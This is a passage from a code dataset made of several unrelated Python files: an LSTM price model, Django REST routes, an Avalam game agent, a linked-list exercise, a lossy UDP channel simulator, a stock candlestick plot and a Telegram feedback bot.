increasing[:minimumLength]\n decreasing = decreasing[:minimumLength]\n\n sequential_data = increasing + decreasing\n random.shuffle(sequential_data)\n\n # Create inputs and outputs\n X = [] # inputs\n y = [] # outputs\n\n for seq, target in sequential_data:\n X.append(seq)\n y.append(target)\n\n return np.array(X), np.asarray(y)\n\n\ndf = createMainDf(FILE_TO_PREDICT)\ndf = addTargets(df)\ntrainDf, testDf = splitTrainAndTest(df)\n\ntrainX, trainY = getXandY(trainDf)\ntestX, testY = getXandY(testDf)\n\n# Build Model\nmodel = Sequential()\nmodel.add( LSTM(128, input_shape=(trainX.shape[1:]), activation='relu', return_sequences=True) )\n# model.add( CuDNNLSTM(128, input_shape=(xTrain.shape[1:]), return_sequences=True) ) If running with GPU\nmodel.add( Dropout(0.2) )\nmodel.add( BatchNormalization() )\n\nmodel.add( LSTM(128, activation='relu', return_sequences=False) )\n# model.add( CuDNNLSTM(128) ) If running with GPU\nmodel.add( Dropout(0.1) )\nmodel.add( BatchNormalization() )\n\nmodel.add( Dense(32, activation='relu') )\nmodel.add( Dropout(0.2) )\nmodel.add( BatchNormalization() )\n\nmodel.add( Dense(32, activation='relu') )\n\nmodel.add( Dense(2, activation='softmax') )\n\n# Hyper params\nopt = tf.keras.optimizers.Adam(lr=0.001, decay=1e-6)\n\nmodel.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=opt,\n metrics=['accuracy'])\n\nmodel.fit(trainX, trainY, epochs=5, validation_data=(testX, testY))","sub_path":"tests/simpleBTC-LSTM.py","file_name":"simpleBTC-LSTM.py","file_ext":"py","file_size_in_byte":4848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"275578307","text":"from django.conf.urls import url, include\nfrom rest_framework import routers\nfrom rest_framework_swagger.views import get_swagger_view\n\nfrom . 
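# Hedged sketch of using the fitted model above to classify the most recent window.
# The model's softmax output is ordered [down-or-flat, up] because classify() maps
# "future > current" to class 1; argmax picks the predicted class.
import numpy as np

latest_window = testX[-1:]                 # shape (1, SEQUENCE_LENGTH, 2): Close + Volume
probs = model.predict(latest_window)[0]
print("P(down) = %.3f, P(up) = %.3f" % (probs[0], probs[1]))
print("prediction:", "up" if int(np.argmax(probs)) == 1 else "down-or-flat")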
import views\n\n\"\"\"\nBecause ViewSet classes are used instead of View classes,\nthere is no need to configure URLs by hand.\nWith a Router, the view code, views and URLs are wired together automatically.\nThe REST framework takes care of the rest.\n\"\"\"\n\nrouter = routers.DefaultRouter()\nrouter.register(r'versions', views.VersionViewSet)\nrouter.register(r'signup', views.SignupViewSet)\nrouter.register(r'login', views.LoginViewSet)\nrouter.register(r'categorys', views.CategoryViewSet)\nrouter.register(r'post', views.PostModelViewSet)\nrouter.register(r'comment', views.CommentViewSet)\nrouter.register(r'change', views.ChangeWordViewSet)\n\nschema_view = get_swagger_view(title='TServer API')\n\nurlpatterns = [\n    url(r'^', include(router.urls)),\n    url(r'^docs$', schema_view),\n    url(r'^api-v1/', include('rest_framework.urls', namespace='rest_framework_category')),\n]","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"643510353","text":"#!/usr/bin/env python3\n\"\"\"\nAvalam agent.\nCopyright (C) 2015, <<<<<<<<<<< YOUR NAMES HERE >>>>>>>>>>>\n\nThis program is free software; you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation; version 2 of the License.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program; if not, see <http://www.gnu.org/licenses/>.\n\n\"\"\"\n\nimport avalam\nimport minimax\nimport random\nimport time\n\n\nclass Agent:\n    \"\"\"This is the skeleton of an agent to play the Avalam game.\"\"\"\n\n    def __init__(self, name=\"Basic_Agent\"):\n        self.name = name\n        self.best_for_step = [0] * 40\n\n    def successors(self, state):\n        \"\"\"The successors function must return (or yield) a list of\n        pairs (a, s) in which a is the action played to reach the\n        state s; s is the new state, i.e. 
a triplet (b, p, st) where\n b is the new board after the action a has been played,\n p is the player to play the next move and st is the next\n step number.\n \"\"\"\n (b, p, st) = state\n if st == 1:\n a = (3, 7, 3, 8)\n b2 = b.clone()\n b2.play_action(a)\n yield (a, (b2, -p, st + 1))\n return\n\n big_towers = self.get_big_towers(state)\n towers = self.get_towers_neighbors(state, big_towers, 2)\n # print(\"big_towers: step \" + str(st) + \" \" + str(big_towers))\n # print(\"towers \" + str(towers))\n for t in towers:\n (i, j) = t\n # print(\"t=\" + str(t))\n ta = b.get_tower_actions(i, j)\n for a in ta:\n # print(\"action : \" + str(a))\n if b.is_action_valid(a):\n b2 = b.clone()\n b2.play_action(a)\n yield (a, (b2, -p, st + 1))\n\n def cutoff(self, state, depth):\n \"\"\"The cutoff function returns true if the alpha-beta/minimax\n search has to stop; false otherwise.\n \"\"\"\n (b, p, st) = state\n time_left = self.time_left - (time.time() - self.time)\n\n max_depth = 3\n if st == 1 or (time_left is not None and (time_left < 150 - 150 // 40 * st or (\n time_left < 30 and st < 30) or time_left < 10)): # the final goes always really fast\n max_depth = 1\n\n if max_depth != self.max_depth:\n self.max_depth = max_depth\n print(max_depth)\n\n return depth > max_depth or b.is_finished()\n\n def evaluate(self, state):\n \"\"\"The evaluate function must return an integer value\n representing the utility function of the board.\n \"\"\"\n\n (b, p, st) = state\n # score = b.get_score()\n score = 0\n score2 = 0\n for t in b.get_towers():\n (i, j, h) = t\n if not b.is_tower_movable(i, j):\n if h > 0:\n score2 += 1\n else:\n score2 -= 1\n else:\n if h > 0:\n score += 1\n else:\n score -= 1\n\n tot_score = score + 3 * score2\n return tot_score\n\n def play(self, board, player, step, time_left):\n \"\"\"This function is used to play a move according\n to the board, player and time left provided as input.\n It must return an action representing the move the player\n will perform.\n \"\"\"\n self.player = player\n self.time_left = time_left\n self.time = time.time()\n self.max_depth = 0\n print(time_left)\n newBoard = avalam.Board(board.get_percepts(player == avalam.PLAYER2))\n state = (newBoard, player, step)\n return minimax.search(state, self)\n\n def get_big_towers(self, state):\n (b, p, st) = state\n towers = b.get_towers()\n if st == 1:\n j = 0\n for t in towers:\n j += 1\n if j > 3:\n break\n yield t\n else:\n for t in towers:\n (i, j, h) = t\n if abs(h) > 1:\n yield t\n\n def get_towers_neighbors(self, state, towers, max_dist):\n (board, p, st) = state\n consider_tower = []\n dir = [0]\n for i in range(1, max_dist + 1):\n dir.append(i)\n dir.append(-i)\n for t in towers: # check around each tower\n (i, j, h) = t\n for a in range(len(dir)):\n for b in range(len(dir)):\n # print (str((i+a,j+b))+\" in_towers:\"+str(self.is_in_towers((i + a, j + b), board))+\" not_in_consid:\" + str((i + a, j + b) not in consider_tower))\n if is_in_towers((i + dir[a], j + dir[b]), board) and (\n i + dir[a], j + dir[b]) not in consider_tower:\n consider_tower.append((i + dir[a], j + dir[b]))\n # print(\"consider: \" + str(consider_tower))\n random.shuffle(consider_tower)\n return consider_tower\n\n\ndef is_in_towers(tower, board):\n \"\"\"\n :param tower: (i,j) tower\n :param towers: [ (i,j,h) , (i,j,h) , ...]\n :return: True if (tower, ?) 
in towers\n \"\"\"\n towers = board.get_towers()\n (i2, j2) = tower\n # print(\"tower : \"+str(tower)+\" all_towers:\"+str(towers))\n for t in towers:\n (i, j, h) = t\n if i == i2 and j == j2:\n return True\n return False\n\n\n#if __name__ == \"__main__\":\n # avalam.agent_main(Agent())\n\n","sub_path":"IAProjects/Projet3/AvalamFramework/super_agent.py","file_name":"super_agent.py","file_ext":"py","file_size_in_byte":5763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"115240361","text":"\"\"\"\n1292. Odd Even Linked List\nGiven a singly linked list, group all odd nodes together followed by the even nodes. Please note here we are talking about the node number and not the value in the nodes.\n\n样例\nExample:\nGiven 1->2->3->4->5->NULL,\nreturn 1->3->5->2->4->NULL.\n\"\"\"\n\n\n# Definition of ListNode\nclass ListNode(object):\n def __init__(self, val, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n \"\"\"\n @param head: a singly linked list\n @return: Modified linked list\n \"\"\"\n # time:984 ms\n def oddEvenList(self, head):\n # write your code here\n odd = ListNode(-1)\n odd_cur = odd\n even = ListNode(-1)\n even_cur = even\n count = 1\n while head:\n if count % 2 == 1:\n odd_cur.next = ListNode(head.val)\n odd_cur = odd_cur.next\n else:\n even_cur.next = ListNode(head.val)\n even_cur = even_cur.next\n count += 1\n head = head.next\n odd_cur.next = even_cur.next\n return odd.next\n\n\na5 = ListNode(5, )\na4 = ListNode(4, a5)\na3 = ListNode(3, a4)\na2 = ListNode(2, a3)\na1 = ListNode(1, a2)\ns =Solution()\nprint(s.oddEvenList(a1))","sub_path":"数据结构 - 线性结构/链表/1292.Odd Even Linked List.py","file_name":"1292.Odd Even Linked List.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"115074209","text":"from django.conf import settings\n\nfrom utils.mail import mail\n\n\ndef notify_tenders(sender, instance, **kwargs):\n from apps.scheduling.models import Event, MailTemplate\n\n mail_template = None\n\n if instance.pk is None:\n if not instance.is_closed:\n mail_template = \"enrollopen\"\n else:\n orig = Event.objects.get(pk=instance.pk)\n if orig.is_closed and not instance.is_closed:\n mail_template = \"enrollopen\"\n elif not orig.is_closed and instance.is_closed:\n mail_template = \"enrollclosed\"\n\n if mail_template:\n try:\n mt = MailTemplate.objects.get(organization=instance.organizer, name=mail_template)\n if mt.is_active:\n members = instance.organizer.membership_set.filter(is_tender=True, is_active=True) \\\n .exclude(user__email=\"\")\n addressees = [m.user for m in members]\n mail(settings.EMAIL_FROM, addressees, mt.subject, mt.template, extraattrs={'event': instance})\n except MailTemplate.DoesNotExist:\n pass\n","sub_path":"apps/scheduling/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"343797821","text":"import copy\nimport json\nimport queue\nimport random\nimport socket\nimport threading\n\nfrom network.packet import MAX_FIELD_VALUE\nfrom network.packet import Packet\n\n\nclass UnreliableDataTransfer:\n\n def __init__(self, source_addr, destination_addr, loss_probability=0.15, error_probability=0.2):\n if not (0 <= loss_probability <= 1):\n raise Exception(\"The loss probability must be a value between 0 and 1\")\n if not (0 <= error_probability <= 1):\n raise Exception(\"The 
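# A hedged alternative to the odd-even linked list solution above: rewire the
# existing ListNode objects in place (O(1) extra space) instead of allocating new
# nodes for each value. Uses the same ListNode class defined in that record.
def odd_even_list_inplace(head):
    if head is None:
        return None
    odd, even = head, head.next
    even_head = even
    while even and even.next:
        odd.next = even.next    # link the next odd-positioned node
        odd = odd.next
        even.next = odd.next    # link the next even-positioned node
        even = even.next
    odd.next = even_head        # append the even chain after the odd chain
    return head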
error probability must be a value between 0 and 1\")\n\n self.loss_probability = loss_probability\n self.error_probability = error_probability\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.socket.bind(source_addr)\n self.destination_addr = destination_addr\n self.receive_queue = queue.Queue()\n self.listener = threading.Thread(name=f\"udt-{source_addr}\", target=self.listen, daemon=True)\n self.listener.start()\n\n def send(self, packet):\n if not isinstance(packet, Packet):\n raise Exception(f\"udt_send expects a Packet as parameter, but received a {type(packet)}\")\n\n if len(packet) == 0:\n raise Exception(f\"udt_send received an empty Packet\")\n\n print(\"Transmitting a packet over the unreliable channel\")\n packet = copy.deepcopy(packet)\n\n if random.uniform(0, 1) >= self.loss_probability:\n if random.uniform(0, 1) < self.error_probability:\n field = random.choice(packet.get_available_fields())\n value = packet.get_field(field)\n value += random.randint(0, MAX_FIELD_VALUE - value)\n packet.set_field(field, value)\n bytes_to_send = json.dumps(packet.data).encode()\n self.socket.sendto(bytes_to_send, self.destination_addr)\n\n def receive(self, timeout=0):\n try:\n return self.receive_queue.get(timeout=timeout)\n except queue.Empty:\n return None\n\n def listen(self):\n while True:\n data, _ = self.socket.recvfrom(1500)\n print(\"Received a packet from the unreliable channel\")\n packet = Packet(json.loads(data.decode()))\n self.receive_queue.put(packet)\n","sub_path":"network/unreliable.py","file_name":"unreliable.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"142148691","text":"\"\"\"Contains a class for handling reading and storing of \nglobal preferences such as the previous experiment and \nthe tab settings. 
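# Hedged usage sketch for UnreliableDataTransfer above: two endpoints on localhost
# exchanging one packet. The Packet-from-dict constructor matches how listen()
# rebuilds packets, but the field names ('seq', 'payload') are assumptions about
# the Packet class, not taken from the source.
a = UnreliableDataTransfer(('127.0.0.1', 5000), ('127.0.0.1', 5001))
b = UnreliableDataTransfer(('127.0.0.1', 5001), ('127.0.0.1', 5000))

a.send(Packet({'seq': 0, 'payload': 'hello'}))  # may be dropped or corrupted on purpose
received = b.receive(timeout=1)                  # None if the packet was lost
print(received.data if received else 'packet lost')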
Normally saved to ~/.meggieprefs.\n\"\"\"\n\nimport os\nimport configparser\n\nfrom meggie.utilities.filemanager import homepath\n\n\nclass PreferencesHandler(object):\n \"\"\" Class for storing and setting preferences.\n \"\"\"\n\n def __init__(self):\n self.prefs_path = \"\"\n self.workspace = \"\"\n self.previous_experiment_name = \"\"\n self.auto_load_last_open_experiment = False\n self.save_bads = False\n self.read_preferences_from_disk()\n\n def write_preferences_to_disk(self):\n \"\"\"Writes the preferences to file system, in INI style.\n \"\"\"\n config = configparser.RawConfigParser()\n config.add_section('MiscOptions')\n config.add_section('Workspace')\n config.add_section('EnvVariables')\n config.add_section('Tabs')\n\n # Sanity of these values is assumed to be checked by the calling method\n config.set('MiscOptions', 'previousExperimentName',\n self.previous_experiment_name)\n config.set('Workspace', 'workspaceDir', self.workspace)\n\n if self.auto_load_last_open_experiment:\n config.set('MiscOptions', 'autoReloadPreviousExperiment', 'True')\n else:\n config.set('MiscOptions', 'autoReloadPreviousExperiment', 'False')\n\n if self.save_bads:\n config.set('MiscOptions', 'saveBads', 'True')\n else:\n config.set('MiscOptions', 'saveBads', 'False')\n\n config.set('Tabs', 'enabledTabs', ','.join(self.enabled_tabs or []))\n config.set('Tabs', 'preset', self.tab_preset)\n\n path = self.prefs_path\n if not path:\n path = os.path.join(homepath(), '.meggieprefs')\n\n with open(path, 'w') as configfile:\n config.write(configfile)\n\n def read_preferences_from_disk(self):\n \"\"\"Reads the preferences from file system into attributes.\n \"\"\"\n filename = os.path.join(homepath(), '.meggieprefs')\n if os.path.isfile(filename):\n config = configparser.RawConfigParser()\n config.read(filename)\n\n try:\n self.workspace = config.get('Workspace', 'workspaceDir')\n except Exception as exc:\n self.workspace = ''\n\n try:\n if config.get('MiscOptions',\n 'autoreloadpreviousexperiment') == 'True':\n self.auto_load_last_open_experiment = True\n else:\n self.auto_load_last_open_experiment = False\n except Exception as exc:\n self.auto_load_last_open_experiment = False\n\n try:\n self.previous_experiment_name = config.get(\n 'MiscOptions', 'previousExperimentName')\n except Exception as exc:\n self.previous_experiment_name = ''\n\n try:\n self.enabled_tabs = config.get('Tabs', 'enabledTabs')\n self.enabled_tabs = self.enabled_tabs.split(',')\n except Exception as exc:\n self.enabled_tabs = ''\n try:\n self.tab_preset = config.get('Tabs', 'preset')\n except Exception as exc:\n self.tab_preset = ''\n\n","sub_path":"meggie/mainwindow/preferences.py","file_name":"preferences.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"417635857","text":"import datetime as dt\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import style\r\nimport pandas as pd\r\nimport pandas_datareader.data as web\r\nfrom mpl_finance import candlestick_ohlc\r\nimport matplotlib.dates as mdates\r\n\r\nstyle.use(['ggplot','dark_background'])\r\n# set up the style of the plot\r\n\r\nstart = dt.datetime(2015, 10, 10)\r\nend = dt.datetime.now()\r\nsource= 'yahoo'\r\nticker = 'TSLA'\r\n# set up the pandas_datareader\r\n\r\ndf = web.DataReader(ticker, source, start, end)\r\n# downloads the historical price\r\n\r\n\r\ndf['50ma'] = df['Close'].ewm(span=50, adjust=False).mean()\r\ndf['100ma'] = df['Close'].ewm(span=100, 
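# Hedged round-trip sketch for PreferencesHandler above; running it mutates the real
# ~/.meggieprefs dotfile. Note that __init__ only defines enabled_tabs/tab_preset
# when a prefs file already exists (they are set in read_preferences_from_disk), so
# a first run must assign them before writing.
prefs = PreferencesHandler()
prefs.workspace = '/tmp/meggie_workspace'        # hypothetical values
prefs.previous_experiment_name = 'demo'
prefs.auto_load_last_open_experiment = True
if not hasattr(prefs, 'enabled_tabs'):
    prefs.enabled_tabs = []
    prefs.tab_preset = ''
prefs.write_preferences_to_disk()

print(PreferencesHandler().previous_experiment_name)   # -> 'demo'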
adjust=False).mean()\r\ndf['1000ma'] = df['Close'].ewm(span=1000, adjust=False).mean()\r\n# computes the moving averages\r\n\r\ndf = df[df.index > '2015-1-1']\r\n\r\n\r\ndf['Date'] = df.index.map(mdates.date2num)\r\nohlc = df[['Date','Open','High','Low','Close']]\r\n# converted date format for ohlc to run\r\n\r\nf1, ax = plt.subplots(figsize = (50,10))\r\n# sets the size of the graph\r\n\r\ncandlestick_ohlc(ax, ohlc.values, width= .6, colorup='green', colordown='red')\r\nax.xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m'))\r\n# plotting the candlesticks\r\n\r\n\r\nax.plot(df.index, df['50ma'], color = 'white', label = '50ma')\r\nax.plot(df.index, df['100ma'], color = 'orange', label = '100ma')\r\nax.plot(df.index, df['1000ma'], color = 'blue', label = '1000ma')\r\n# plots the moving average lines\r\n\r\n\r\nax.grid(True)\r\nax.legend()\r\n\r\nplt.show()\r\n\r\n","sub_path":"Candlestick.py","file_name":"Candlestick.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"56746862","text":"import asyncio\nimport logging\nimport typing\n\nfrom aiogram import Bot, Dispatcher, executor, types\nfrom aiogram.utils import callback_data, exceptions\n\nfrom config import API_TOKEN, DB_HOST, DB_NAME, DB_PASS, DB_PORT, DB_USER, admin_id\nfrom db_module import DB_module\nfrom poll_module import get_text_from, get_next_question \nfrom analysis_module import get_analysis\n\n\n# Data base\nDB = DB_module(DB_HOST, DB_NAME, DB_USER, DB_PASS, DB_PORT)\n\n\n# Configure logging\nlogging.basicConfig(level=logging.INFO)\nlog = logging.getLogger('messages_sender')\n\n# Initialize bot and dispatcher\nbot = Bot(token=API_TOKEN)\ndp = Dispatcher(bot)\n\n# structure of the callback buttons\nbutton_cb = callback_data.CallbackData('button', 'question_name', 'answer', 'data')\n\n\nlike_word = 'Нравится'\nlike_mark = 2\ndislike_word = 'Не нравится'\ndislike_mark = 1\nlike_dislike_list = ['Нравится', 'Не нравится']\nlike_list = ['Нравится 👍', 'Не нравится']\ndislike_list = ['Нравится', 'Не нравится 👎']\n\nkeywords_day = ['Меню позавчера', \n                'Меню вчера', \n                'Меню сегодня']\nloyaltyMark_word = 'Оценить работу компании' \nbasemenu_list = keywords_day + [loyaltyMark_word,]\n\nwho_should_send_menu = {}\n\n\n\ndef make_keyboard(question_name, answers, data = 0):\n    \"\"\" Returns an inline keyboard for the given answers \"\"\"\n    if not answers: return None\n\n    keyboard = types.InlineKeyboardMarkup()\n    row = []\n    for answer in answers: # make a button for every answer \n        cb_data=button_cb.new(question_name = question_name,\n                              answer = answer,\n                              data = data)\n        row.append(types.InlineKeyboardButton(answer,\n                                              callback_data=cb_data))\n    if len(row) <= 2: keyboard.row(*row)\n    elif len(row) == 10:\n        keyboard.row(*row[:5])\n        keyboard.row(*row[5:])\n    else:\n        for button in row: keyboard.row(button)\n    \n    return keyboard\n\n\ndef get_basemenu_keyboard():\n    keyboard = types.ReplyKeyboardMarkup(resize_keyboard=True)\n    for name in basemenu_list: keyboard.add(types.KeyboardButton(name))\n    return keyboard\n    \ndef check_low_answers(user_id):\n    answer = DB.get_last_answer(user_id = user_id)\n    for name in ['loyalty', 'manager', 'delivery', 'cooking', 'dietetics']:\n        if int(answer[name]) < 7: return True\n    return False\n\n\n@dp.message_handler(commands=['start'])\nasync def send_phone(message: types.Message):\n    logging.info('start command from: %r', message.from_user.id) \n    \n    DB.add_user(message.from_user.id, \n                message.from_user.first_name, \n                message.from_user.last_name, \n                
message.from_user.username, \n                message.from_user.language_code)\n\n    keyboard = types.ReplyKeyboardMarkup(one_time_keyboard=True, \n                                         resize_keyboard=True)\n    keyboard.add(types.KeyboardButton('Отправить телефон 📞', \n                                      request_contact=True))\n    text = get_text_from('./text_of_questions/authorization.txt')\n    await message.answer(text, reply_markup = keyboard)\n\n\n@dp.message_handler(commands=['help'])\nasync def send_help(message: types.Message):\n    logging.info('help command from: %r', message.from_user.id) \n    keyboard = get_basemenu_keyboard()\n    await message.answer(get_text_from('./text_of_questions/help.txt'), \n                         reply_markup=keyboard)\n\n\n@dp.callback_query_handler(button_cb.filter(\n    question_name=['start', 'loyalty', 'manager', 'delivery', 'cooking', 'dietetics']))\nasync def callback_vote_action(\n        query: types.CallbackQuery, callback_data: typing.Dict[str, str]):\n    \n    # callback_data contains all info from callback data\n    logging.info('Got this callback data: %r', callback_data) \n    \n    await query.answer()  # don't forget to answer callback query as soon as possible\n    callback_question = callback_data['question_name']\n    callback_answer = callback_data['answer']\n    \n    DB.add_answer(user_id = query.from_user.id, \n                  question_name = callback_question, \n                  answer = callback_answer)\n    \n    question_name, text, answers = get_next_question(callback_question,\n                                                     callback_answer)\n    keyboard = make_keyboard(question_name, answers)\n    \n    edited_text = query.message.text + '\\n\\nВаша оценка: ' + callback_answer\n\n    await bot.edit_message_text(\n        edited_text,\n        query.from_user.id,\n        query.message.message_id,\n        reply_markup=None,\n    )\n    \n    await bot.send_message(query.from_user.id, text, reply_markup = keyboard)\n    \n    if question_name == 'end':\n        if check_low_answers(query.from_user.id):\n            await bot.send_message( \n                query.from_user.id, \n                'Расскажите, почему вы поставили низкую оценку?')\n        else:\n            await bot.send_message( \n                query.from_user.id, \n                'Вы также можете оставить тут свой отзыв.')\n\n\n    \nasync def send_menu(user_id, keyword_day):\n    \"\"\" \n    The client picked a day. \n    The bot sends that day's menu: a list of dishes with like/dislike buttons.\n    \n    \"\"\"\n    menu = DB.get_menu(keyword=keyword_day)\n    if not menu:\n        await bot.send_message(user_id, 'Извините, меню на этот день отсутствует')\n        return\n    \n    dishes = DB.get_dish(menu_id=menu['id'])\n    \n    await bot.send_message(user_id, '📅 Меню на '+str(menu['date'])+':')\n    \n    for dish in dishes:\n        feedback = DB.get_feedback(user_id = user_id, dish_id = dish['id'])\n        if not feedback:\n            list_for_keyboard = like_dislike_list\n        elif feedback['mark'] == 2:\n            list_for_keyboard = like_list\n        elif feedback['mark'] == 1:\n            list_for_keyboard = dislike_list\n        else:\n            list_for_keyboard = like_dislike_list\n        \n        keyboard = make_keyboard('feedback', \n                                 list_for_keyboard, \n                                 dish['id'])\n        await bot.send_message(user_id, dish['name'], reply_markup = keyboard)\n    \n    \n@dp.callback_query_handler(button_cb.filter(question_name=['feedback']))\nasync def callback_like(query: types.CallbackQuery, \n                        callback_data: typing.Dict[str, str]):\n    \"\"\" The client pressed like/dislike under a dish. \"\"\"\n    # callback_data contains all info from callback data\n    logging.info('Got this callback data: %r', callback_data) \n    \n    await query.answer()  # don't forget to answer callback query as soon as possible\n    from_user = query.from_user.id\n    callback_question = callback_data['question_name']\n    callback_answer = callback_data['answer']\n    callback_ans_data = callback_data['data']\n    \n    if callback_answer not in like_dislike_list: return\n    \n    if callback_answer == like_word:\n        mark_from_user = like_mark\n        list_for_keyboard = like_list\n    elif callback_answer == dislike_word:\n        mark_from_user = dislike_mark\n        list_for_keyboard = dislike_list \n    \n    DB.update_feedback(user_id = from_user, \n                       dish_id = callback_ans_data, \n                       mark = mark_from_user) \n    \n    keyboard = make_keyboard(callback_question, \n                             list_for_keyboard, \n                             callback_ans_data )\n\n    await bot.edit_message_text(query.message.text,\n                                query.from_user.id,\n                                query.message.message_id,\n                                reply_markup=keyboard )\n    \n\n@dp.message_handler(commands=['admin'])\nasync def admin_options(message: types.Message):\n    logging.info('admin command from: %r', message.from_user.id) \n    \n    if message.from_user.id in admin_id:\n        question_name, text, answers = get_next_question('admin_options')\n        keyboard = make_keyboard(question_name, answers)\n    else: \n        text = 'У вас нет доступа'\n        keyboard = None\n    \n    await message.answer(text, reply_markup = keyboard)\n\n\n@dp.callback_query_handler(button_cb.filter(question_name=['admin']))\nasync def callback_admin_action(\n        query: types.CallbackQuery, callback_data: typing.Dict[str, str]):\n    \n    # callback_data contains all info from callback data\n    logging.info('Got this callback data: %r', callback_data) \n    \n    await query.answer()  # don't forget to answer callback query as soon as possible\n    callback_question = callback_data['question_name']\n    callback_answer = callback_data['answer']\n    \n    question_name, text, answers = get_next_question(callback_question,\n                                                     callback_answer)\n    keyboard = make_keyboard(question_name, answers)\n    \n    await bot.send_message(query.from_user.id, text, reply_markup = keyboard)\n    \n    if question_name == 'table_loyalty':\n        headings = ['id', 'Имя','Фамилия','username','язык','номер телефона',\n                    'id','id', 'дата ответа', 'лояльность', 'менеджер', \n                    'доставка', 'кулинария', 'диетология', 'отзыв']\n        filepath = 'smartfood_all_answers.xls'\n        DB.export_answer_loyalty_to_excel(headings, filepath)\n        document = open(filepath,'rb')\n        await bot.send_document(query.from_user.id, document)\n    \n    elif question_name == 'analysis':\n        text = get_analysis(DB.get_answers())\n        await bot.send_message(query.from_user.id, text)\n    \n    elif question_name == 'table_menu_fb':\n        headings =['Имя', 'Фамилия', 'username', 'номер телефон', \n                   'название блюда', 'дата меню', 'дата отзыва', \n                   'отметка (2-нравится, 1-не нравится)', 'отзыв'] \n        filepath = 'smartfood_menu_feedback.xls'\n        DB.export_menu_feedback_to_excel(headings, filepath)\n        document = open(filepath,'rb')\n        await bot.send_document(query.from_user.id, document)\n    \n    elif question_name == 'add_new_menu':\n        who_should_send_menu[query.from_user.id] = True\n        \n        text = get_text_from('./text_of_questions/menu_exemple.txt')\n        await bot.send_message(query.from_user.id, text)\n    \n    elif question_name == 'stop_add':\n        who_should_send_menu[query.from_user.id] = False\n    \n\n    \n    \n    \n@dp.message_handler(lambda message: message.text in basemenu_list)\nasync def base_menu(message: types.Message):\n    \"\"\"\n    Handle a button press from the base menu\n    and start the corresponding process:\n    
Оценка меню\n Оценка компании\n \"\"\"\n logging.info('push basemenu button from: %r', message.from_user.id)\n if message.text in keywords_day:\n await message.answer(get_text_from('./text_of_questions/menu_instruction.txt'))\n await send_menu(message.from_user.id, message.text)\n elif message.text == loyaltyMark_word:\n await message.answer(get_text_from('./text_of_questions/start_poll.txt'))\n question_name, text, answers = get_next_question('start_poll')\n keyboard = make_keyboard(question_name, answers)\n await message.answer(text, reply_markup = keyboard )\n \n return \n\ndef parse_message(text):\n message_list = text.split('\\n')\n try:\n menu_id = DB.add_menu(str_date = message_list[0])\n if not menu_id: \n return 'Ошибка. Можно добавлять меню только на будущие дни'\n \n for i in range(1,len(message_list)):\n if message_list[i]!='':\n DB.add_dish(menu_id, message_list[i])\n return f'Новое меню на {message_list[0]} добавлено.'\n except:\n return 'Ошибка. Не удалось добавить это меню'\n\n\n@dp.message_handler(content_types = types.message.ContentType.TEXT)\nasync def new_text_message(message: types.Message):\n \"\"\"\n Принимает текстовые сообщения\n Если это ответет на сообщение с блюдом, то записывается отзыв на блюдо\n Иначе просто какой-то отзыв \n \"\"\"\n newmessage_is_simple_review = True\n if 'reply_to_message' in message:\n reply_to_message = message.reply_to_message\n if 'reply_markup' in reply_to_message:\n newmessage_is_simple_review = False\n inline_keyboard = reply_to_message.reply_markup.inline_keyboard\n dish_id_str = inline_keyboard[0][0].callback_data.split(':')[-1]\n DB.update_feedback(user_id = message.from_user.id, \n dish_id = int(dish_id_str), \n review = message.text) \n logging.info('new review from: %r', message.from_user.id)\n await message.reply('Я передам ваш отзыв. Спасибо!')\n \n elif message.from_user.id in who_should_send_menu:\n if who_should_send_menu[message.from_user.id]:\n newmessage_is_simple_review = False\n text = parse_message(message.text)\n await message.reply(text)\n \n if newmessage_is_simple_review:\n logging.info('new message from: %r', message.from_user.id) \n DB.add_review(user_id = message.from_user.id, text = message.text)\n keyboard = get_basemenu_keyboard()\n await message.reply('Я передам эту информацию руководству компании. 
Спасибо!',\n reply_markup=keyboard)\n \n\n@dp.message_handler(content_types = types.message.ContentType.CONTACT)\nasync def new_contact(message: types.Message):\n \"\"\"\n Если приходит контакт, то записываем как новый номер юзера\n И отправляем help и базавое меню\n \n \"\"\"\n logging.info('new phone from: %r', message.from_user.id) \n DB.add_phone(user_id = message.from_user.id, \n phone = message.contact.phone_number)\n await message.reply(get_text_from('./text_of_questions/phone.txt'),\n reply_markup = types.ReplyKeyboardRemove())\n \n text = get_text_from('./text_of_questions/first_instruction.txt')\n keyboard = get_basemenu_keyboard()\n await message.answer(text, reply_markup = keyboard)\n\n\n@dp.message_handler(content_types = types.message.ContentType.ANY)\nasync def staf(message: types.Message):\n \"\"\" любой другой контент просто отметаем\"\"\"\n logging.info('strange staf from: %r', message.from_user.id)\n await message.reply(get_text_from('./text_of_questions/wtf.txt'))\n\n\n\nif __name__ == '__main__':\n executor.start_polling(dp, 